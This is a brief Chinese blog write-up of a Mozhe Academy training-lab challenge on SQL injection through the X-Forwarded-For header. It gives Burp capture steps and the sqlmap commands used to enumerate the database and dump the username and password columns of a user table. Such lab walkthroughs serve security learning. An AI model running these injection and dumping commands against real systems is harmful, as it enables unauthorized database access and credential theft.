墨者学院 – X-Forwarded-For注入漏洞实战Writeup

2019年3月14日11:16:32 发表评论 浏览量:291次

1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示

墨者学院 - X-Forwarded-For注入漏洞实战Writeup

2.爆出当前的数据库

sqlmap -r 1.txt --current-db --batch

3.爆表名

sqlmap -r 1.txt -D webcalendar -T user --columns --batch

4.爆表中的字段

sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

5.得到帐号密码

墨者学院 - X-Forwarded-For注入漏洞实战Writeup

6.登陆获得KEY

墨者学院 - X-Forwarded-For注入漏洞实战Writeup

avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: